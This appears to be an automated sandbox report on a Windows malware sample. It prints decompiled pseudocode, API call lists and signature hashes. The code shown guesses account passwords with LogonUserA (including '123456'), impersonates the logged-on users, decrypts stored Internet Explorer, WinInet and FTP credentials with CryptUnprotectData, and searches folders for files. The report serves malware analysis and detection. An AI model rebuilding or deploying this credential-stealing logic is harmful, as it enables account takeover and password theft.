                                                                    																CloseHandle(_v340);
                                                                    																goto L22;
                                                                    															} else {
                                                                    																_t51 = ImpersonateLoggedOnUser(_v336);
                                                                    																__eflags = _t51;
                                                                    																if(_t51 == 0) {
                                                                    																	CloseHandle(_v336);
                                                                    																	CloseHandle(_v340);
                                                                    																	goto L22;
                                                                    																} else {
                                                                    																	_t59 = _t59 + 1;
                                                                    																	_v652 = 0;
                                                                    																	_t55 =  &_v652;
                                                                    																	_push(_t55);
                                                                    																	_push(0xf003f);
                                                                    																	L004107E4();
                                                                    																	__eflags = _t55;
                                                                    																	if(_t55 == 0) {
                                                                    																		__eflags = _v652;
                                                                    																		if(_v652 != 0) {
                                                                    																			_push(_v652);
                                                                    																			_pop( *0x414869);
                                                                    																		}
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    											break;
                                                                    										}
                                                                    										CloseHandle(_v644);
                                                                    									}
                                                                    									return _t59;
                                                                    								} else {
                                                                    									goto L6;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					return __eax;
                                                                    				}
                                                                    			}
                                                                    0x00402db3
                                                                    0x00402db3
                                                                    0x00402db6
                                                                    0x00000000
                                                                    0x00402dbc
                                                                    0x00402dce
                                                                    0x00402dce
                                                                    0x00402dd0
                                                                    0x00000000
                                                                    0x00402dd2
                                                                    0x00402dd2
                                                                    0x00402de1
                                                                    0x00402de7
                                                                    0x00402de9
                                                                    0x00402e46
                                                                    0x00000000
                                                                    0x00402deb
                                                                    0x00402dee
                                                                    0x00402df4
                                                                    0x00402df6
                                                                    0x00402e34
                                                                    0x00402e3c
                                                                    0x00000000
                                                                    0x00402df8
                                                                    0x00402df8
                                                                    0x00402df9
                                                                    0x00402e03
                                                                    0x00402e09
                                                                    0x00402e0a
                                                                    0x00402e0f
                                                                    0x00402e14
                                                                    0x00402e16
                                                                    0x00402e18
                                                                    0x00402e1f
                                                                    0x00402e21
                                                                    0x00402e27
                                                                    0x00402e27
                                                                    0x00402e1f
                                                                    0x00402e2d
                                                                    0x00402df6
                                                                    0x00402de9
                                                                    0x00402dd0
                                                                    0x00402db6
                                                                    0x00402dad
                                                                    0x00000000
                                                                    0x00402d82
                                                                    0x00402e68
                                                                    0x00402e68
                                                                    0x00402e71
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402d21
                                                                    0x00402d18
                                                                    0x00402d0f
                                                                    0x00402cfd
                                                                    0x00402cfd
                                                                    0x00402cfd

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: explorer.exe
                                                                    • API String ID: 0-3187896405
                                                                    • Opcode ID: 218728443306cc9d00ae8efdbf020c82e4af88c1d60a6babb47cb0d0ca7da1f5
                                                                    • Instruction ID: 6cf2bdf8de8470b1e15b5c95fcd56135633905720b215610431ce2b02da368ac
                                                                    • Opcode Fuzzy Hash: 218728443306cc9d00ae8efdbf020c82e4af88c1d60a6babb47cb0d0ca7da1f5
                                                                    • Instruction Fuzzy Hash: F0313930A40208AADF229B61CD49BEE7BB4AB44344F1044B7E105B11E1DBB99FD5DF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 82%
                                                                    			E0041032D(char* __eax, void* __ecx, void* __eflags) {
                                                                    				void* _v64;
                                                                    				CHAR* _v68;
                                                                    				char _v72;
                                                                    				CHAR* _v76;
                                                                    				CHAR* _v80;
                                                                    				CHAR* _v84;
                                                                    				void* _v88;
                                                                    				void* _v92;
                                                                    				char _v96;
                                                                    				char _v100;
                                                                    				char _v104;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				char _t45;
                                                                    				char _t47;
                                                                    				int _t49;
                                                                    				char _t50;
                                                                    				char _t54;
                                                                    				char _t57;
                                                                    				char _t59;
                                                                    				char _t65;
                                                                    				void* _t68;
                                                                    				char _t70;
                                                                    				char _t71;
                                                                    				CHAR* _t75;
                                                                    
                                                                    				_t43 = __eax;
                                                                    				_push(_t68);
                                                                    				_push(_t75);
                                                                    				_push(0x410343);
                                                                    				asm("clc");
                                                                    				if(__eflags < 0) {
                                                                    					 *((intOrPtr*)(_t68 + 0x414b2b3d)) =  *((intOrPtr*)(_t68 + 0x414b2b3d)) + 1;
                                                                    					 *__eax =  &(__eax[ *__eax]);
                                                                    					__eflags =  *__eax;
                                                                    					if( *__eax == 0) {
                                                                    						L4:
                                                                    						__eflags = 0;
                                                                    						return 0;
                                                                    					} else {
                                                                    						__eflags =  *0x414b37;
                                                                    						if( *0x414b37 != 0) {
                                                                    							_t70 =  *0x4173a5; // 0x6349a8
                                                                    							while(1) {
                                                                    								_t71 = _t70;
                                                                    								__eflags = _t71;
                                                                    								if(__eflags == 0) {
                                                                    									break;
                                                                    								}
                                                                    								_t45 = E00402BCA(_t43, __eflags);
                                                                    								__eflags =  *0x4173a9;
                                                                    								if( *0x4173a9 == 0) {
                                                                    									L9:
                                                                    									_v64 = 0;
                                                                    									_t47 = LogonUserA( *(_t71 + 4), 0,  *(_t71 + 4), 2, 0,  &_v64);
                                                                    									_t48 = _t47;
                                                                    									__eflags = _t47;
                                                                    									if(_t47 == 0) {
                                                                    										_t49 = E00402A1D(_t48,  *(_t71 + 4));
                                                                    										_v68 = _t49;
                                                                    										_push( *(_t71 + 4));
                                                                    										L0041066A();
                                                                    										_t50 = LCMapStringA(0x400, 0x100,  *(_t71 + 4), _t49, _v68, _t49);
                                                                    										__eflags = _t50;
                                                                    										if(_t50 == 0) {
                                                                    											L14:
                                                                    											E004018B8(_v68);
                                                                    											_t75 = "123456";
                                                                    											L15:
                                                                    											_v64 = 0;
                                                                    											_t54 = LogonUserA( *(_t71 + 4), 0, _t75, 2, 0,  &_v64);
                                                                    											__eflags = _t54;
                                                                    											if(_t54 != 0) {
                                                                    												goto L16;
                                                                    											}
                                                                    										} else {
                                                                    											_v64 = 0;
                                                                    											_t65 = LogonUserA( *(_t71 + 4), 0, _v68, 2, 0,  &_v64);
                                                                    											__eflags = _t65;
                                                                    											if(_t65 == 0) {
                                                                    												goto L14;
                                                                    											} else {
                                                                    												E004018B8(_v68);
                                                                    												goto L16;
                                                                    											}
                                                                    										}
                                                                    									} else {
                                                                    										L16:
                                                                    										_v100 = 0x20;
                                                                    										_v96 = 1;
                                                                    										 *_t25 =  *(_t71 + 4);
                                                                    										 *_t27 =  *((intOrPtr*)(_t71 + 8));
                                                                    										_v84 = 0;
                                                                    										_v80 = 0;
                                                                    										_v76 = 0;
                                                                    										_v72 = 0;
                                                                    										_t57 =  &_v100;
                                                                    										_push(_t57);
                                                                    										_push(_v64);
                                                                    										L00410868();
                                                                    										__eflags = _t57;
                                                                    										if(_t57 == 0) {
                                                                    											_v104 = 0;
                                                                    										} else {
                                                                    											__eflags = _v72;
                                                                    											if(_v72 != 0) {
                                                                    												_push(_v72);
                                                                    												_pop( *0x414869);
                                                                    											}
                                                                    											_v104 = 1;
                                                                    										}
                                                                    										_t59 = ImpersonateLoggedOnUser(_v64);
                                                                    										_t60 = _t59;
                                                                    										__eflags = _t59;
                                                                    										if(__eflags != 0) {
                                                                    											E0040FD60(_t60, _t71, _t75, __eflags);
                                                                    											__eflags =  *0x414b23;
                                                                    											if( *0x414b23 != 0) {
                                                                    												RevertToSelf();
                                                                    											}
                                                                    											 *0x414869 = 0x80000001;
                                                                    										}
                                                                    										__eflags = _v104;
                                                                    										if(_v104 != 0) {
                                                                    											_push(_v72);
                                                                    											_push(_v64);
                                                                    											L0041086E();
                                                                    										}
                                                                    										CloseHandle(_v64);
                                                                    									}
                                                                    									asm("cld");
                                                                    									_t43 = 0;
                                                                    									asm("repne scasb");
                                                                    									__eflags =  *_t75;
                                                                    									if( *_t75 != 0) {
                                                                    										goto L15;
                                                                    									}
                                                                    								} else {
                                                                    									_push( *(_t71 + 4));
                                                                    									_push( *0x4173a9);
                                                                    									L00410712();
                                                                    									_t43 = _t45;
                                                                    									__eflags = _t45;
                                                                    									if(_t45 != 0) {
                                                                    										goto L9;
                                                                    									} else {
                                                                    									}
                                                                    								}
                                                                    								_t70 =  *_t71;
                                                                    							}
                                                                    							return 1;
                                                                    						} else {
                                                                    							goto L4;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					return __eax;
                                                                    				}
                                                                    			}

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 123456
                                                                    • API String ID: 0-158520161
                                                                    • Opcode ID: 9e2e08eb7098b4a3e74be6c44804e6ce63f5975dc39676ed667ad46d90c9c269
                                                                    • Instruction ID: 162fa20a4eef0904e001b52781486bdd0e96aabe3a3ff4935987bad036a14f5f
                                                                    • Opcode Fuzzy Hash: 9e2e08eb7098b4a3e74be6c44804e6ce63f5975dc39676ed667ad46d90c9c269
                                                                    • Instruction Fuzzy Hash: 59515C70904208EFEF119FA1DD86BEDBBB5EB04304F148066E610B91E1C7F99AD4DB29
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 60%
                                                                    (the trailing "// @ 0x..." comment on each line is the instruction address the decompiler reports for that line)
                                                                    			E0040A557(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                    				char _v1028;
                                                                    				char _v2052;
                                                                    				int _v2056;
                                                                    				int _v2060;
                                                                    				intOrPtr _v2064;
                                                                    				char _v2068;
                                                                    				char _v2072;
                                                                    				char _v2076;
                                                                    				void* _v2080;
                                                                    				char _v2084;
                                                                    				void* _v2088;
                                                                    				char _v2092;
                                                                    				intOrPtr _v2096;
                                                                    				void* _t53;
                                                                    				char* _t54;
                                                                    				void* _t57;
                                                                    				char* _t62;
                                                                    
                                                                    				E0040A2A9(_a4,  &_v1028, _a20); // @ 0x0040a56d
                                                                    				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v2052, 0x3ff, 0, 0); // @ 0x0040a58b
                                                                    				_v2068 = 0x10; // @ 0x0040a590
                                                                    				_v2064 = 2; // @ 0x0040a59a
                                                                    				_v2060 = 0; // @ 0x0040a5a4
                                                                    				_v2056 = 0; // @ 0x0040a5ae
                                                                    				_t53 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v2076,  &_v2072,  &_v2068, 0); // @ 0x0040a5e2
                                                                    				if(_v2076 == 0 || _v2072 == 0) { // @ 0x0040a5ec
                                                                    					return _t53; // @ 0x0040a70f
                                                                    				} // @ 0x0040a70f
                                                                    				_v2096 = 0xbeef0000; // @ 0x0040a5ff
                                                                    				_push("Internet Explorer"); // @ 0x0040a609
                                                                    				_t54 =  &_v1028; // @ 0x0040a60e
                                                                    				_push(_t54); // @ 0x0040a614
                                                                    				L00410712(); // @ 0x0040a615
                                                                    				if(_t54 == 0) { // @ 0x0040a61c
                                                                    					L5: // @ 0x0040a660
                                                                    					_t57 = StrStrIA( &_v2052, "DPAPI: "); // @ 0x0040a671
                                                                    					if(_t57 == 0) { // @ 0x0040a673
                                                                    						_t57 = E0040A4E9(_v2096, _a12, _v2072, _v2076, _a16); // @ 0x0040a6fe
                                                                    					} else { // @ 0x0040a675
                                                                    						if( *0x414b43 != 0) { // @ 0x0040a67c
                                                                    							_push(_v2076); // @ 0x0040a682
                                                                    							_pop( *_t29); // @ 0x0040a688
                                                                    							_push(_v2072); // @ 0x0040a68e
                                                                    							_pop( *_t31); // @ 0x0040a694
                                                                    							_t57 =  *0x414b43( &_v2084, 0, 0, 0, 0, 1,  &_v2092); // @ 0x0040a6b8
                                                                    							if(_t57 != 0) { // @ 0x0040a6ba
                                                                    								E0040A4E9(_v2096, _a12, _v2088, _v2092, _a16); // @ 0x0040a6d4
                                                                    								_t57 = LocalFree(_v2088); // @ 0x0040a6df
                                                                    							} // @ 0x0040a6df
                                                                    						} // @ 0x0040a6ba
                                                                    					} // @ 0x0040a67c
                                                                    					L10: // @ 0x0040a703
                                                                    					_push(_v2072); // @ 0x0040a703
                                                                    					L0041079C(); // @ 0x0040a709
                                                                    					return _t57; // @ 0x00000000
                                                                    				} // @ 0x0040a709
                                                                    				_v2096 = 0xbeef0001; // @ 0x0040a61e
                                                                    				_push("WininetCacheCredentials"); // @ 0x0040a628
                                                                    				_t62 =  &_v1028; // @ 0x0040a62d
                                                                    				_push(_t62); // @ 0x0040a633
                                                                    				L00410712(); // @ 0x0040a634
                                                                    				if(_t62 == 0) { // @ 0x0040a63b
                                                                    					goto L5; // @ 0x00000000
                                                                    				} // @ 0x00000000
                                                                    				_v2096 = 0xbeef0002; // @ 0x0040a63d
                                                                    				_push("MS IE FTP Passwords"); // @ 0x0040a647
                                                                    				_t57 =  &_v1028; // @ 0x0040a64c
                                                                    				_push(_t57); // @ 0x0040a652
                                                                    				L00410712(); // @ 0x0040a653
                                                                    				if(_t57 != 0) { // @ 0x0040a65a
                                                                    					goto L10; // @ 0x00000000
                                                                    				} // @ 0x00000000
                                                                    				goto L5; // @ 0x00000000
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
                                                                      • Part of subcall function 0040A2A9: 73D5A680.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2EB
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A58B
                                                                    • lstrcmpi.KERNEL32(?,Internet Explorer), ref: 0040A615
                                                                    • lstrcmpi.KERNEL32(?,WininetCacheCredentials), ref: 0040A634
                                                                    • lstrcmpi.KERNEL32(?,MS IE FTP Passwords), ref: 0040A653
                                                                    • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A66C
                                                                    • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A6B2
                                                                    • LocalFree.KERNEL32(?), ref: 0040A6DF
                                                                    • 73D5A680.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A709
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcmpi$A680ByteCharMultiWide$CryptDataFreeLocalUnprotect
                                                                    • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                                                    • API String ID: 2102354470-3076635702
                                                                    • Opcode ID: 316b5cd246f5946664c4fd6bc4d269ab0d69fb1bc722cfdc9a0684b5eae608d5
                                                                    • Instruction ID: d2a922008bdebd86f42a8708ca9441522aabe83a0fc08158bea3eb6d75d48dad
                                                                    • Opcode Fuzzy Hash: 316b5cd246f5946664c4fd6bc4d269ab0d69fb1bc722cfdc9a0684b5eae608d5
                                                                    • Instruction Fuzzy Hash: A741187190021CEADF219E50CC42FDABAB9BF08304F04C0A6F644750D0DBB69AE59FD9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 71%
                                                                    (the trailing "// @ 0x..." comment on each line is the instruction address the decompiler reports for that line; the report's address column ends before the last three lines)
                                                                    			E0040BC36(void* __eax, intOrPtr _a8, intOrPtr _a12, void* _a16) {
                                                                    				int _v8;
                                                                    				char _v12;
                                                                    				char _v16;
                                                                    				int _v20;
                                                                    				char _v24;
                                                                    				char _v28;
                                                                    				int _v32;
                                                                    				char _v36;
                                                                    				void* _v40;
                                                                    				void* _v44;
                                                                    				char _v48;
                                                                    				void* _v52;
                                                                    				int _v56;
                                                                    				char* _v60;
                                                                    				void* _t54;
                                                                    				void* _t55;
                                                                    				int _t73;
                                                                    				int _t75;
                                                                    				int _t76;
                                                                    
                                                                    				_t54 = __eax; // @ 0x0040bc36
                                                                    				if(_a16 == 0 ||  *0x414b43 == 0) { // @ 0x0040bc42
                                                                    					return _t54; // @ 0x0040bc50
                                                                    				} else { // @ 0x0040bc53
                                                                    					_t55 = _a16; // @ 0x0040bc53
                                                                    					__eflags =  *0x418e9c - _t55; // 0x0 @ 0x0040bc56
                                                                    					if(__eflags < 0) { // @ 0x0040bc5c
                                                                    						__eflags =  *0x418ea0 - _t55; // 0x5 @ 0x0040bc62
                                                                    						if(__eflags < 0) { // @ 0x0040bc68
                                                                    							__eflags =  *0x418ea4 - _t55; // 0x3 @ 0x0040bc6e
                                                                    							if(__eflags < 0) { // @ 0x0040bc74
                                                                    								E0040B552(_a12,  *0x418e9c,  &_v8,  &_v12,  &_v16); // @ 0x0040bc8f
                                                                    								E0040B552(_a12,  *0x418ea4,  &_v20,  &_v24,  &_v28); // @ 0x0040bca9
                                                                    								E0040B552(_a12,  *0x418ea0,  &_v32,  &_v36,  &_v40); // @ 0x0040bcc3
                                                                    								_push(_v32); // @ 0x0040bcc8
                                                                    								_pop( *_t16); // @ 0x0040bccb
                                                                    								_push(_v40); // @ 0x0040bcce
                                                                    								_pop( *_t18); // @ 0x0040bcd1
                                                                    								_v52 = 0; // @ 0x0040bcd4
                                                                    								_t55 =  *0x414b43( &_v48, 0, 0, 0, 0, 1,  &_v56); // @ 0x0040bcf3
                                                                    								__eflags = _t55; // @ 0x0040bcf3
                                                                    								if(_t55 != 0) { // @ 0x0040bcf5
                                                                    									__eflags = _v52; // @ 0x0040bcfb
                                                                    									if(_v52 != 0) { // @ 0x0040bcff
                                                                    										__eflags = _v56 - _v32; // @ 0x0040bd08
                                                                    										if(_v56 <= _v32) { // @ 0x0040bd0b
                                                                    											asm("cld"); // @ 0x0040bd11
                                                                    											asm("jecxz 0x4"); // @ 0x0040bd1b
                                                                    											memcpy(_v40, _v52, _v56); // @ 0x0040bd1d
                                                                    											_push(_v56); // @ 0x0040bd1f
                                                                    											_pop( *_t29); // @ 0x0040bd22
                                                                    											_t55 = LocalFree(_v52); // @ 0x0040bd28
                                                                    											__eflags = _v8; // @ 0x0040bd2d
                                                                    											if(_v8 != 0) { // @ 0x0040bd31
                                                                    												__eflags = _v20; // @ 0x0040bd37
                                                                    												if(_v20 != 0) { // @ 0x0040bd3b
                                                                    													__eflags = _v32; // @ 0x0040bd41
                                                                    													if(_v32 != 0) { // @ 0x0040bd45
                                                                    														_v60 = E004018CF(_v8); // @ 0x0040bd53
                                                                    														_t73 = E00401906(_v16, _v60, _v8); // @ 0x0040bd5f
                                                                    														_push("ftp://"); // @ 0x0040bd64
                                                                    														L0041066A(); // @ 0x0040bd69
                                                                    														_t75 = StrCmpNIA(_v60, "ftp://", _t73); // @ 0x0040bd7c
                                                                    														__eflags = _t75; // @ 0x0040bd7c
                                                                    														if(_t75 != 0) { // @ 0x0040bd7e
                                                                    															_push("http://"); // @ 0x0040bd80
                                                                    															L0041066A(); // @ 0x0040bd85
                                                                    															_t75 = StrCmpNIA(_v60, "http://", _t75); // @ 0x0040bd93
                                                                    														} // @ 0x0040bd93
                                                                    														_t76 = _t75; // @ 0x0040bd98
                                                                    														__eflags = _t76; // @ 0x0040bd98
                                                                    														if(_t76 != 0) { // @ 0x0040bd9a
                                                                    															_push("https://"); // @ 0x0040bd9c
                                                                    															L0041066A(); // @ 0x0040bda1
                                                                    															_t76 = StrCmpNIA(_v60, "https://", _t76); // @ 0x0040bdaf
                                                                    														} // @ 0x0040bdaf
                                                                    														__eflags = _t76; // @ 0x0040bdb4
                                                                    														if(_t76 == 0) { // @ 0x0040bdb6
                                                                    															E00401569(_a8, 0xbeef0000); // @ 0x0040bdc0
                                                                    															E00401569(_a8,  *0x418e98); // @ 0x0040bdce
                                                                    															E0040159F(_a8, _v16, _v8); // @ 0x0040bddc
                                                                    															E0040159F(_a8, _v28, _v20); // @ 0x0040bdea
                                                                    															E0040159F(_a8, _v40, _v32); // @ 0x0040bdf8
                                                                    														} // @ 0x0040bdf8
                                                                    														return E004018B8(_v60); // @ 0x00000000
                                                                    													} // @ 0x0040be00
                                                                    												} // @ 0x0040bd45
                                                                    											} // @ 0x0040bd3b
                                                                    										} // @ 0x0040bd31
                                                                    									} // @ 0x0040bd0b
                                                                    								} // @ 0x0040bcff
                                                                    							} // @ 0x0040bcf5
                                                                    						} // @ 0x0040bc74
                                                                    					} // @ 0x0040bc68
                                                                    					return _t55;
                                                                    				}
                                                                    			}
                                                                    0x0040be08
                                                                    0x0040be08

                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BCED
                                                                    • LocalFree.KERNEL32(00000000,?), ref: 0040BD28
                                                                    • lstrlen.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD69
                                                                    • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD77
                                                                    • lstrlen.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD85
                                                                    • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD93
                                                                    • lstrlen.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDA1
                                                                    • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDAF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$CryptDataFreeLocalUnprotect
                                                                    • String ID: ftp://$http://$https://
                                                                    • API String ID: 3968356742-2804853444
                                                                    • Opcode ID: 16666fb40e7306a47e8451c35a35ac53ab369c7cfa398845364db40496014646
                                                                    • Instruction ID: e50de70f366a9a73352d6ba0206718c11b41da89e4af0f10d66e37424ec97bcb
                                                                    • Opcode Fuzzy Hash: 16666fb40e7306a47e8451c35a35ac53ab369c7cfa398845364db40496014646
                                                                    • Instruction Fuzzy Hash: 8A51EB31910109FADF11AB91DC41EEEBB7AFF48318F14403AF611B11A1D7799A90DF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 90%
                                                                    			E00408961(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, char* _a8, char* _a12) {
                                                                    				struct _WIN32_FIND_DATAA _v322;
                                                                    				void* _v328;
                                                                    				CHAR* _v332;
                                                                    				char* _v336;
                                                                    				char* _t36;
                                                                    				signed int _t38;
                                                                    				CHAR* _t40;
                                                                    				void* _t44;
                                                                    				char* _t47;
                                                                    				int _t50;
                                                                    				signed int _t51;
                                                                    				char** _t53;
                                                                    				signed int _t55;
                                                                    				void* _t57;
                                                                    				void* _t66;
                                                                    				void* _t67;
                                                                    				signed int* _t68;
                                                                    				void* _t72;
                                                                    
                                                                    				_t72 = __edi;
                                                                    				_t67 = __ecx;
                                                                    				_t66 = __ebx;
                                                                    				_v332 = 0;
                                                                    				_t36 = _a8;
                                                                    				if(_t36 == 0 ||  *_t36 == 0) {
                                                                    					L20:
                                                                    					return E004018B8(_v332);
                                                                    				} else {
                                                                    					_t38 = E004025A9(_a8);
                                                                    					_t39 = _t38;
                                                                    					__eflags = _t38;
                                                                    					if(_t38 != 0) {
                                                                    						_t40 = E00401DF8(_t39, _a8, "*.*");
                                                                    					} else {
                                                                    						_t40 = E00401DF8(_t39, _a8, "\*.*");
                                                                    					}
                                                                    					_v332 = _t40;
                                                                    					E004018E6( &_v322, 0x13e);
                                                                    					_t44 = FindFirstFileA(_v332,  &_v322);
                                                                    					_v328 = _t44;
                                                                    					__eflags = _t44 + 1;
                                                                    					if(_t44 + 1 != 0) {
                                                                    						do {
                                                                    							_t68 =  &_v322;
                                                                    							__eflags =  *_t68 & 0x00000010;
                                                                    							if(( *_t68 & 0x00000010) == 0) {
                                                                    								_v336 =  &(_t68[0xb]);
                                                                    								_t47 = StrStrIA(_v336, _a12);
                                                                    								_t48 = _t47;
                                                                    								__eflags = _t47;
                                                                    								if(_t47 != 0) {
                                                                    									E0040891C(_t66, _t67, _t68, _t72, __eflags, _a4, E00401E4C(E00401DF8(_t48, _a8, "\\"), _t62, _v336));
                                                                    									E004018B8(_t63);
                                                                    								}
                                                                    							} else {
                                                                    								_t51 =  &(_t68[0xb]);
                                                                    								_push(_t51);
                                                                    								_push(0x414f84);
                                                                    								L00410712();
                                                                    								__eflags = _t51;
                                                                    								if(_t51 != 0) {
                                                                    									_t53 =  &( &_v322->cFileName);
                                                                    									_push(_t53);
                                                                    									_push(0x414f86);
                                                                    									L00410712();
                                                                    									__eflags = _t53;
                                                                    									if(_t53 != 0) {
                                                                    										_t55 = E004025A9(_a8);
                                                                    										_t56 = _t55;
                                                                    										__eflags = _t55;
                                                                    										if(_t55 != 0) {
                                                                    											_t57 = E00401DF8(_t56, _a8, 0);
                                                                    										} else {
                                                                    											_t57 = E00401DF8(_t56, _a8, "\\");
                                                                    										}
                                                                    										E00408961(_t66, _t67, _t72, _a4, E00401E4C(_t57, _t57,  &( &_v322->cFileName)), _a12);
                                                                    										E004018B8(_t58);
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							_t50 = FindNextFileA(_v328,  &_v322);
                                                                    							__eflags = _t50;
                                                                    						} while (_t50 != 0);
                                                                    						FindClose(_v328);
                                                                    					}
                                                                    					goto L20;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 004089D1
                                                                    • lstrcmpi.KERNEL32(00414F84,?), ref: 004089FA
                                                                    • lstrcmpi.KERNEL32(00414F86,?), ref: 00408A17
                                                                    • FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 00408ABE
                                                                    • FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 00408AD1
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                                      • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                                      • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                    • String ID: *.*$\*.*
                                                                    • API String ID: 3040542784-1692270452
                                                                    • Opcode ID: 93c6d3b74171b0ec779853f72d136b32b6b8433b99017211a0ae1c5e3eb0744c
                                                                    • Instruction ID: 5ea2f1443042eb35dbb5eee109b5069dc3daeb25fe79f4f70908f7877fe18fba
                                                                    • Opcode Fuzzy Hash: 93c6d3b74171b0ec779853f72d136b32b6b8433b99017211a0ae1c5e3eb0744c
                                                                    • Instruction Fuzzy Hash: 6A317E70A00209AEDF10BF61CD42FEE7769AF40304F1041BBF458B51E2DB789AD1AE59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A9DF
                                                                    • lstrlenW.KERNEL32(00416369,?,?,00000000), ref: 0040AA1D
                                                                    • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040AA4D
                                                                    • LocalFree.KERNEL32(00000000), ref: 0040AA7F
                                                                    • CredFree.ADVAPI32(00000000), ref: 0040AA9D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
